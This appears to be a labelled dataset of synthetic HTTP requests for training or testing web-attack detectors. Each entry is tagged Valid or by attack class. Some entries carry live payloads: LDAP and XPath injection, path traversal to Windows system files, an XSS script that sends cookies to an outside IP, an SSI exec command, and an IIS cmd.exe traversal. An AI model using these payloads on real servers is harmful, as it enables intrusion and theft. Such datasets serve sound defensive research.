Proxy-Authorization: Digest opaque="lectex2b"
Authorization: sIaieC zon1iAtz=slii6a4
Range: -6,-0
Referer: /i3mLE4/n14Hluoi/Tbahtos/YeeTw/o1bhrh.js
TE: gzip,deflate;q=0.7,deflate
Trailer: If-Match
User-Agent: ilcFeCvF http://www.tgrUd.org
UA-CPU: x86
UA-Disp: 451,9242,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0571x6226
Via: FTP/2.2 www.tba1stfp.jpg
Transfer-Encoding: deflate
Upgrade: etani/8.7, cfAetN/7.0
Warning: 126 www.tttHrTrO.gif "d5Snbahld" 
X-Forwarded-For: 155.94.169.142
X-Serial-Number: 74622774860135514346
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27209
Start - Id: 9035
class: Valid
GET /ermsht2rm2n7/ectM-5/yesiedtoyghitet5c.htm?jetyeaj5mheSA=Nnnode&nEonuaas=e%3F2&ropenIoCpusrs=594195655&ehdi=9881498 HTTP/1.0
Host: 115.209.181.151
Connection: 5odt
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.2, identity;q=0.4
Accept-Language: 4o-sGtwh;q=0.8, h4wqehn-f2neFH;q=0.3, 9o6noeEt-t4tsheds
Cache-Control: no-store
Client-ip: 210.110.130.125
Cookie: mailKdeletei=jenshsudmuee9;aRetrim=9074127836;ca7sSl=o
Cookie2: $Version="8"
Date: Wed, 05 Apr 06 05:42:34 GMT
ETag: W/"Y14f4SrMfgaAbDaMHQq"
Expect: fstEe=rleuhia5;lee7msh=iAare
From: asncwO@udwr.ch
If-Modified-Since: Fri, 03 Oct 08 06:23:17 CET
If-Unmodified-Since: Sat, 20 Dec 08 18:13:16 GMT
If-Match: "ujr.bBPsxujW9is"
If-None-Match: "1XEQGnJrxeatR_rNi"
If-Range: *
Max-Forwards: 370
MIME-Version: 0.6
Pragma: xw=D0tumaa
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: Basic aHJiY2U6c2FlYzE=
Range: -9,-8753
Referer: /0nlhd/wo5lttm/pameeeOs/iVpnaSy/lxIseton.mpg
TE: trailers,chunked;q=0.3
Trailer: TE
User-Agent: Mozilla/1.6 (compatible; t5aah; Open BSD i586; nEos2orht)
UA-CPU: 68000
UA-Disp: 7331,790,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 454x187
Via: FTP/8.3 14.168.170.28
Transfer-Encoding: gzip
Upgrade: hrimd/4.4
Warning: 922 50.163.11.232 "daeh5so" 
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9035
Start - Id: 38320
class: LdapInjection
GET /ehXMmuUvjlDFq/ebyrl0mATDR/lhavingPD/S0g2m2jAXlo5sock_stream2from/jres4oobcthavte/elti.jsp?Ewchoc=%25&hmbummx=tmn0haetnhew9eOco1&xeccuge=tno&79GNNlctelnet=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&v5orCcopy6W8position=teao&t1n=341&entne6eieekgttt=esod0aieett7ehpns&NEO3nwH=eQorl&as7vrste3w7emU=nuhtaccese9s%7C%25uchaew%3Bwpit&niai=aTyv9&el=lmona&nfwRhahreswa81a=eirnbs&Ra5edash3vxF=2aoWarYtvgi4 HTTP/1.1
Host: 187.151.72.10
Connection: close
Accept: video/*;q=0.7
Accept-Charset: iso-8859-8;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 168.193.87.154
Cookie: ud=elciyjnodekobjectdegi;tsFcsnhaosua=oR9Jd
Cookie2: $Version="35"
Date: Mon, 26 Apr 04 16:55:36 CET
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Tue, 30 Jun 09 24:13:22 UTC
If-Unmodified-Since: Sun, 29 Mar 09 12:25:19 CET
If-Match: "zUwsr3Ut2Oo6_X@@8Y"
If-None-Match: *
If-Range: "VKC4AgD2lbvjicK@et.q"
Max-Forwards: 9298
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: hErbc n4s2nAe=uw8q
Range: 981434-8
Referer: http://9srqnsr.de/eeetH/ss7e/hnri.php4
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.7 (X11; U; Linux i586 8.2; m9-om; rv:8.1.4) Gecko/00352059
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 036x964
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: gzip
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 055236562928
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38320
Start - Id: 48796
class: XPathInjection
GET /1oQvR_6qW/ngHx/-W/lXX9QF/iVSv51.f4phL_-4792/e6gFLtXp6@VLAtK/8h5r/k24pvechoQ/tk@GVOMG.js?.rexW9ts577=1tHgmals&Oly=%28i++++%3C+++count%28uvl%2Fchild%3A%3Atext%28%29%29+and+++++j+++%3C+++count%28gphe%2Fchild%3A%3Acomment%28%29%29+++++and++++k++++%3C++count%28ie%2Fchild%3A%3A*%29+%29&Mconnects8AZCCAj=615152 HTTP/1.1
Host: www.nltl.de
Connection: bltstut
Accept: */*;q=0.5
Accept-Charset: iso-2022-jp;q=0.5, cp-950;q=0.9, windows-1251;q=0.0
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 208.70.172.168
Cookie: i1ius=f0aderpsaiv4;ShtaccespY-p=mn;oio=ni;rb6roeoEh=9;co44t=tdbaltY+j;ehltftohaa=69
Cookie2: $Version="75"
Date: Thu, 08 Mar 07 06:47:20 GMT
ETag: W/"gTz@WD@id8M7yzIPzc"
Expect: 100-continue
From: rokltsth@ewew.uk
If-Modified-Since: Sat, 07 Aug 04 08:29:49 CET
If-Unmodified-Since: Sun, 21 Nov 04 18:54:50 GMT
If-Match: "jG.f3nc1sD9gKE9oKd."
If-None-Match: "PfGO7I.73rfKKJ8yUGfZ"
If-Range: *
Max-Forwards: 1879
MIME-Version: 7.6
Pragma: aidoo='9Utgrr2e'
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: NTLM Z1NzbHJOYTZpazFlZ2hlcmFlcWFpa3I1YWVzaW1zV3JjcnNzb3JldE1jOA==
Range: -2670
Referer: http://www.aierpe.org/tacNb5e/eoqsb/m2ddpr/shtedc/cbrddd.php
TE: gzip
Trailer: If-Match
User-Agent: 6-aXWWad http://www.defetsim.com
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: HTTP/2.1 www.tsttIrr.htm, 2.7 113.189.150.76
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 435 www.dsxS.html:99 "eing" "Thu, 16 Jun 05 09:56:23 CET"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48796
Start - Id: 38266
class: LdapInjection
GET /pnenproe2n1A/dz3-3qESZ8kaOw-oNn/sa6F2e0FZnT/vEjL7RhttpBbP/asHh1eei58emNeona/ieotlero/lcueizeldoneS/TGqBQZIlogjvlsvY/QdUU3VKqKSv8XI@/-9clGR-s9z.2x/8woxDb.wsY.asp?stsO8lsno0e=%29++++%28+%7C++%28cn%3D*o+%27brien*+%29%28mail+%3D*o+%27brien*+++%29+++&rdraemeeaelrsk=548&optGUtwp-=npzS_J_f2_K&T9i9etamsm=9scriptae&rst=987731&e3oHitf37ntia=x6tltjlu&yaigzi=825&2cabenblhLisqtr=hnaho&wtfaAklsge=%24qte&bPqceswrXvWe=x_HfhFu-%40&dli6smfba=vXteKg.&7tlrfn=593 HTTP/1.0
Host: www.thoqag.biz
Connection: close
Accept: audio/x-wav, image/gif;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: shl-v2hrTN, iwmAs3a-dano;q=0.7, eH-Di7;q=0.0, uyFnu-qlHlfriT;q=0.0, ds-2tNaaf
Cache-Control: no-transform
Client-ip: 135.46.160.61
Cookie: hrrebEcnnef=59
Cookie2: $Version="03"
Date: Fri, 15 Oct 04 21:31:30 UTC
ETag: "RtXlyZgjYG5n60XYwM"
Expect: 100-continue
From: iaon@um9ltetugp.biz
If-Modified-Since: Tue, 21 Mar 06 09:28:53 GMT
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Oct 04 05:09:26 UTC
Max-Forwards: 0567
MIME-Version: 6.7
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Digest username="pneDogep"
Range: 97538-,1799-
Referer: /anRorh/armeeer/kdoOhL.png
TE: trailers,gzip;q=0.7,trailers
Trailer: Proxy-Authorization
User-Agent: su2prd (5UCYUue)
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 7.2 207.85.189.179
Transfer-Encoding: identity
Upgrade: tme6o5/8.8
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38266
Start - Id: 45451
class: PathTransversal
GET /ie/sdrruc/eek6LX/KdY7.8Xrh-iGautoexecnullB/7tBpYwFR2vY.A.@t2BC0/SK5cjMYY/qaccess_logDGs3.8HTzchildpNE/SDr-OsV.5l4@1Rb/omtaQ72znLLQpSk-/svS_z8-_5JTnqWfVfiU2/3kIposition5jallOMVqlinkK.nsf?fyeetmioitom=61&sunsRreng=8116&hemxf4u=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&u9ecO=j3alo-&hseanef1=7ifgak&NgVvEw=n&evlaSbiodalere=hchildee&Tdxtmp9S=zi8ka6fynrh&Reoupk66ayeZtgt=8938&csirmReRs=0rahuh&dor6d=bdnrit HTTP/1.0
Host: 219.14.210.181:80
Connection: andyO
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.4, compress, identity;q=0.0
Accept-Language: 7e-0Huom;q=0.4, eigoaoaa-naors;q=0.0, jto9hg-weeetu0;q=0.0, tsasu-mirtCcb
Cache-Control: only-if-cached
Cookie: execWbF5W=4;e7meet=002503618;D5sK9=An0i;eu=i3HmQmU0Fstt;yie=xh ;cogtesthMalen=0820716
Cookie2: $Version="1"
Date: Sat, 17 Apr 04 18:52:53 UTC
Expect: 100-continue
If-Modified-Since: Sun, 17 Jan 10 24:09:22 CET
If-Unmodified-Since: Sun, 04 Oct 09 11:19:01 UTC
If-Match: "DC0vdWRkRIA2BEBp"
If-None-Match: *
If-Range: Mon, 05 Sep 05 04:03:44 UTC
Max-Forwards: 437
Pragma: no-cache
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: NTLM cTQ3YU9lbmZ3emQ3YXdvaHRjcGVtU3N0dWthUnRkYmFwYWE4cG9xeWps
Range: -884,93-882862,81022-507
Referer: /neeiA/oiauEet/lretp/omkq/4cHw.jsp
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 8.8; fj-gI; rv:0.7.2) Gecko/13780186
UA-Disp: 5353,5285,32
UA-OS: FreeBSD
UA-Color: color32
Via: 4.8 www.ocwfdia7.jpg:7894, olkan/6.1 171.27.90.190
Transfer-Encoding: compress
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9
Warning: 895 95.106.146.142 "tark01bhtisa" 
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 30742004292799508718
----: -----------
~~~~~: ~~~~~~~~~~

null

End - Id: 45451
Start - Id: 13547
class: Valid
GET /sdEgamraoeyelA.html?r3tobject2d=lcorCyOThfpeva&wvjUlib0X_.-CB=ebwt&Oes=%3D+dzyhratmp%5Caj8ne&8enrEveish=vZMWMS55Hn&gmontIehrDs=nA&pzttrNderfg=ne HTTP/1.1
Host: www.FsbrLe.uk
Connection: pdEs
Accept: */*
Accept-Charset: x-mac-roman;q=0.9, x-mac-icelandic;q=0.8, x-mac-hebrew, gb2312;q=0.3
Accept-Encoding: compress;q=0.8, identity;q=0.6, gzip;q=0.3
Accept-Language: ivewg-1nhkMap;q=0.8, ahdegup-ao2daJ, idneh-ohiy;q=0.3, timd-z75
Cache-Control: no-transform
Client-ip: 82.35.59.17
Cookie: cttaesrje=a5ncvSa5g
Cookie2: $Version="91"
Date: Tue, 29 Sep 09 15:55:39 UTC
ETag: W/"gQhz8jE0KLxYqpu"
Expect: 100-continue
From: ntyteei@sees9at.be
If-Modified-Since: Mon, 15 Jan 07 19:18:21 GMT
If-Unmodified-Since: Tue, 02 Oct 07 17:27:19 CET
If-Match: "-Nr9nJnb610-ABz"
If-None-Match: *
If-Range: Wed, 13 Jun 07 20:38:13 UTC
Max-Forwards: 9531
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: noxn uaenegsM=zmtlt
Authorization: NTLM c3RlZ25lckVudGxOYXlhbmxyYm5ldGc1dTFwaUFlMndlcm04b2E=
Range: 91-168
Referer: /rwoaneh/noqwnx.pl
TE: chunked;q=0.4,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.8 (X11; U; Linux i386 8.2; ps-3c; rv:9.5.6) Gecko/14517653
UA-CPU: MIPS
UA-Disp: 1899,114,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1988x830
Via: HTTP/8.4 www.eujuoru.png
Transfer-Encoding: hsEeds
Upgrade: aon/3.5, vnn/6.0, TohiyS/5.0, sxhL/6.8
Warning: 886 127.240.182.252 "oanisdpetibienNEet" "Thu, 20 Aug 09 04:46:20 GMT"
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 70032554284651
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13547
Start - Id: 32646
class: Valid
PUT /mS9DA0@/5go/ihi/nis/EG.swf? HTTP/1.0
Content-Length: 202
Content-Language: 7k91h,e1
Content-Encoding: gzip
Content-Location: http://5Awx.uk/shmeafHu/toDggdia/1hem/iUnehad8.mpg
Content-MD5: RUdhYXMxSW1lb2FzaG42dg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Nov 06 04:06:32 CET
Last-Modified: Tue, 27 Mar 07 03:02:51 GMT
Host: 129.198.91.105:80
Connection: keep-alive
Accept: text/*;q=0.1, image/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aad-cpqI2;q=0.1
Cache-Control: max-age=75
Client-ip: 93.93.209.53
Cookie: I.VDI1rmq@2Wu=83828;EmdeojsRa29=7;eAae8efisi8r=tPXu6jN;0O=r7wn3ne;;osainaTrs5elalw=3365
Cookie2: $Version="7"
Date: Tue, 08 Dec 09 10:24:34 GMT
ETag: W/".0pIV1_QIC.Mco8kO"
Expect: o2e6oYIs=ohjah;Geiwj=lhih
From: qm5eae@2ere.be
If-Modified-Since: Wed, 17 Nov 04 19:21:41 GMT
If-Unmodified-Since: Sun, 05 Nov 06 13:36:14 UTC
If-Match: *
If-None-Match: "eqN6sj45sFYgpdg."
If-Range: Sat, 23 Jan 10 12:43:27 GMT
Max-Forwards: 953
MIME-Version: 8.6
Pragma: wt=0jrre
Proxy-Authorization: Basic c2FlaHJkU2U6OWxiVW0=
Authorization: Digest nc=F12caC48
Range: -8365,-00217
Referer: http://www.lunaiEi.de/fte4md/lB0swre7/eteo/czteer/3ifLa.png
TE: chunked,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.9 (X11; U; Open BSD i386 8.6; ir-nn; rv:6.5.5) Gecko/23034687
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: h1aDpt/1.2 218.174.3.18, 9.0 178.89.97.96:54063
Transfer-Encoding: deflate
Upgrade: Fohi/2.6, ehegs/6.0, ypq/6.5, im8Z/1.0
Warning: 166 182.140.231.49 "qo7ntkcIsaeidh7" "Thu, 17 Feb 05 17:04:23 CET"
X-Forwarded-For: 1.120.217.6
X-Serial-Number: 14198779071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

6ftaetihNoeedw=085598&5GUQ3WHfN5=kllreplacelio&nnnst3ie9naesdy=4&Atosig=hA2qJ&0elblgs8dby=w3fS9zF&tasHtottbn=rseu&s&UnRaP=90&tlIo=133195&mHVservices3MsnfZ=t&oexe9lv=hbetweens&odktS6sffnIjy=homemlog|

End - Id: 32646
Start - Id: 16420
class: Valid
GET /rp4an0pto/utlrj3/oxOP682U4ECmKyy0/i6mVKTl91YJ_c5o/nmamcBiw/cQSn-1tEgiZEnQXnq/suoa/ri.png?ftyezuwEe6reo=896529790&lsTn9epscniadc=aeo&fisa9E=72382&ehomeCxk=5&iusms=%5Cdotlt%264ngItil&NXn42ygZU4=wnetoiehogaaie&raiaatlsSopeIit=drop5eis&0e=e6d+bgsoundh&Jjhsboot.iniQjg3=wwt HTTP/1.0
Host: 229.87.53.124
Connection: keep-alive
Accept: text/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 30.116.144.95
Cookie: etalarI=wA> eeselecthn>na;r3silce=&l+B;soUenlfh=1tJ4nkeaRd;eeet=orse t>fbnls%irg;vseiwoee3seoSsm=263569;vEIZ= +ga ceT
Cookie2: $Version="252"
Date: Tue, 23 Aug 05 20:39:29 CET
ETag: "YsJV2YzymeT3eunT36"
Expect: taeom
From: Sgspznl@eul4hW.net
If-Modified-Since: Sun, 28 Mar 04 17:03:42 CET
If-Unmodified-Since: Thu, 09 Jun 05 22:36:26 GMT
If-Match: "kIHCXFv9Rf8qO2W8JY9L"
If-None-Match: *
If-Range: Wed, 26 Apr 06 03:42:38 GMT
Max-Forwards: 051
MIME-Version: 5.3
Pragma: dlms='oBiaraH'
Proxy-Authorization: Digest uri=/isau/hiace.nsf
Authorization: Digest response="d0C0dE07Fdc794e697d20A6B0aF17eFA"
Range: 3-586,36497-7
Referer: /5eGiwwE/zqonm/sxdodofs/azeo/eeerot.msf
TE: trailers,trailers
Trailer: Host
User-Agent: r2aYma/2.3.0.2.7
UA-CPU: PowerPC
UA-Disp: 227,815,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 238x9595
Via: HTTP/5.7 www.hqvi4uhe.jpg, 7.3 www.elrey.png
Transfer-Encoding: gzip
Upgrade: f0v/2.9, s8dtN/9.2
Warning: 597 131.243.210.234:4 "dcab" 
X-Forwarded-For: 150.85.0.128
X-Serial-Number: 493178
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16420
Start - Id: 22192
class: Valid
GET /o0wy/ntdR-gDr7a4h2RqfVd/iEai.msf?sB6zP24vscript=access_logEo&grtahliasrsqeht=3263&ssldq3pifns=shutdown%25u%2Fo%29Ea4l%7Ej+t%3D&xt7qfC=354&geeia=trlolUkon07&weXw6JNo.=tnttpXtn&entmMoRebsrerR=6&hw-linkHMmH=71488699&uchad=fZEdVc-V.w&xgseeha=eTtuol4eiabnrttU5e&wsen8eaxt=%29w&xpniotglOlaf=re6ntrh1T HTTP/1.1
Host: 13.124.197.225:80
Connection: vmlmE6
Accept: */*
Accept-Charset: x-mac-greek, windows-1250;q=0.1
Accept-Encoding: *
Accept-Language: lry-siarouw, zc-slbEd;q=0.8, atoeeo-cr;q=0.4, ceWew8E-slee
Cache-Control: min-fresh=94473
Client-ip: 133.68.63.195
Cookie: 22Eca=zd@hr-rs eion dtmu 5;t9a3oen7=jo'a<xiu;ciEk3hrbtttYe=gEbe-Tat7Z4;ehj=94713;sye=44
Cookie2: $Version="958"
Date: Tue, 02 Jan 07 02:42:49 GMT
ETag: "0_zQzCu3BckhMp7"
Expect: sixoriu=oErhbir
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Wed, 24 Dec 08 17:21:42 CET
If-Unmodified-Since: Mon, 25 Apr 05 20:18:50 CET
If-Match: "Ckp-xRbQB6yjalLJu"
If-None-Match: *
If-Range: "izuo9z.ibZKs01Lm0lki"
Max-Forwards: 4996
MIME-Version: 1.6
Pragma: tihog='tSi1'
Proxy-Authorization: Basic dDI0YzppYndobg==
Authorization: sher igkt5=ewKlbryn
Range: 616571-065,-685
Referer: http://www.seibvn.gov/atnvymu/hatt98d/rt1tp/Frsl.bin
TE: deflate;q=0.5,trailers
Trailer: Via
User-Agent: Mozilla/7.1 (compatible; sbtan; Unix; 2elioh; guewarc; o5jy)
UA-CPU: Sparc
UA-Disp: 6686,450,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 850x114
Via: FTP/5.8 64.82.164.188:6857, FTP/4.8 61.242.83.180, HTTP/9.7 www.elm4rebm.jpeg
Transfer-Encoding: compress
Upgrade: dtt6ee/8.3, tfTa/8.6, e3o/6.1, snle/8.8
Warning: 577 133.51.82.232:3250 "nwoeWd5awlant" "Sat, 28 Jul 07 24:56:13 GMT"
X-Forwarded-For: 64.80.52.43
X-Serial-Number: 29292278992836758450
----: ----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 22192
Start - Id: 47583
class: XSS
GET /iaaMNCkFySQCMqjp/Es/hqmnpdTiOmdiltose/zDNsVr0@fO3/sw28iiFI9XuWmzEPY1J/e2EIGdKO/notnwyrsmeshdp8ei/LKQ2d/htpasskXmoNLrmYZ/O7Rhttp0htpassfFnlocationXIhaC.asmx?t3tdau=mDIoc5a-0&atho=imgS&ehso5tsoloteaf=input&l0ieofofn=35610648&gE-U@y=enys&sSometa0=Arb&u4agqlriv=07957020&scriptKwhere_l=uhrme&b9Yi=200390512&etcY6HYYGxcD=havingeteo&o1tEairrt=Tims&noSTr=As0rgv&rrdi=%3C%21--+--+--%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F141.198.237.192%2Fon.asp%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E%3C%21--+--+--%3E&eg9btba7su75h=5taE&16rsndeo=bsE6 HTTP/1.1
Host: 137.185.90.120
Connection: keep-alive
Accept: audio/basic
Accept-Charset: isiri-3342, isiri-3342, windows-1250;q=0.9, iso-8859-8-i;q=0.1, us-ascii;q=0.9
Accept-Encoding: identity, identity, identity;q=0.3, gzip
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 118.106.166.150
Cookie: edehtlndal=19987025;o9wpdsIR=661908;n-EREF2lhaving=60584
Cookie2: $Version="3"
Date: Fri, 02 Jul 04 16:08:46 UTC
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: 100-continue
From: i5nNat@viikl.cz
If-Modified-Since: Fri, 19 Jun 09 01:51:24 UTC
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: "nFdZo1UgkTYO85hNkSR"
If-None-Match: *
If-Range: Mon, 24 Mar 08 17:21:40 GMT
Max-Forwards: 9341
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest qop=m2ta
Authorization: NTLM dHZhc2VzeVNvbXNnYXNobGg1bmU1bGFkbW9tbzl2OGF0cjZzdHU=
Range: 849916-
Referer: http://www.nrtaAfi.st/oknrjss.pl
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/9.8 (compatible; hroenasgO; Solaris; oqhaIc; betrc4k; secac)
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: HTTP/1.5 131.21.20.244, iktlJz/9.6 www.ies9.htm:10500
Transfer-Encoding: lnnec
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 691 91.163.92.153 "daitswr4lqZadnb" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47583
Start - Id: 40089
class: SSI
GET /lserFisr2jEea/c2nddeGbiO/tSaokitbiHz/lReVj8/fhi/athrrUeasnFi.jpeg?Tz9VP=+vp9&NEPv8.H9O=%3C%21++%23%3C%21--++++%23exec++cmd%3D%22id%22--%3E&ttsfcatm=359&uHr=cn6so&rxl=3a+ptsnf+eiE6e&wyt88aiu=980877151&fnt47fcyhar=56&UY1nullhu=emvnoexlmd%3DeyCs HTTP/1.0
Host: 141.34.114.121:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, utf-7;q=0.1, isiri-3342;q=0.8, windows-1250, euc-kr
Accept-Encoding: *;q=0.4
Accept-Language: pi-rfai, 9sAt-rod;q=0.3
Cache-Control: no-store
Client-ip: 139.170.207.9
Cookie: tre9a=nhy
Cookie2: $Version="41"
Date: Sun, 01 Jun 08 19:01:42 GMT
ETag: W/"_Xa4edX9KDjWHxZa1Le"
Expect: 100-continue
From: eolu8j@aioa.fr
If-Modified-Since: Mon, 10 Oct 05 20:44:53 GMT
If-Unmodified-Since: Fri, 29 Jan 10 11:10:10 CET
If-Match: "-ZDjZU2orI9zNNOZ2"
If-None-Match: "fk8cu4sMfGdoBgsFDG"
If-Range: Sat, 25 Apr 09 22:13:54 CET
Max-Forwards: 2
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: eke5at o9mi=ikHts9eh
Range: 1646-745
Referer: http://drseb.cz/tpnn/ws3ce/ddhWhfnl.jsp
TE: deflate;q=0.8,chunked;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 8.4; mo-in; rv:8.6.6) Gecko/06385665
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0944x596
Via: HTTP/9.4 232.225.23.220, 4.5 156.113.93.118:2288, 6.6 www.gutnrU.tiff:0
Transfer-Encoding: identity
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40089
Start - Id: 44334
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.dstre.it
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iadonAE-nt5Ee8, iaTSnrm5-nt8dC;q=0.8, gkeu9e-o, 7ayyt-iurkarS;q=0.3, Et-ei
Cache-Control: max-age=3
Client-ip: 189.90.122.222
Cookie: eosleoth=Anm8zy~
Cookie2: $Version="29"
Date: Thu, 18 Dec 08 09:24:26 CET
ETag: "JwOlqko42x3NtlOT"
Expect: tnstr3=Ht7tPac;rhjSmod
From: ssaaei@srTei5is.de
If-Modified-Since: Tue, 17 Jan 06 01:32:43 GMT
If-Unmodified-Since: Sat, 19 Aug 06 14:20:48 UTC
If-Match: *
If-None-Match: *
If-Range: "KifzXthQy8DwbK-h6d"
Max-Forwards: 1
MIME-Version: 1.6
Pragma: 7mWl='niVY'
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: http://www.soh5or.uk/nhn1cu/lrIko/9iUd.rar
TE: trailers
Trailer: If-None-Match
User-Agent: uKj71D http://www.3h4zrdm.com
UA-CPU: PowerPC
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: ao4d8z/0.3 www.Fpodoa6.htm, 0.7 102.52.140.200, byeheb/8.3 39.125.50.193:9139
Transfer-Encoding: gzip
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44334
Start - Id: 18071
class: Valid
GET /n77ethnR5rdn7wrsfe/uwncvd7eth1ye/u2n1nsal/ot9gGwpnad_e_d8wAhe/brRoj1Tz0ZT5-vNea/4x_/o0@ZcL46suz/t8mHPm/hoanpahe3o0Rcaursn/Xc32aapgaMn7ieeds/q8nCselectqs/eGF2QD_mL759hIWDC.jpeg?eefpSra=4%406RmWgh&f4ojselmtoxuUk=ye&ezvSiqw=i%3FzSidnkm%27&mnbmcot0ru5rhAB=biFnh&IasrNajcnhomt=017&Dhsl=nodehttpr&hdeniarlnj1h=607374&nitsvl=xn%26%5C&vmeLur3Seldht=9017555906&isajc8=rsxW&Fsystemi5Miw=tcyaf&e8OetedenxOl=749&4eeheo=80&eit7ee=tmpl&EaI7.-=t HTTP/1.0
Host: www.hhhtN.biz
Connection: close
Accept: */*
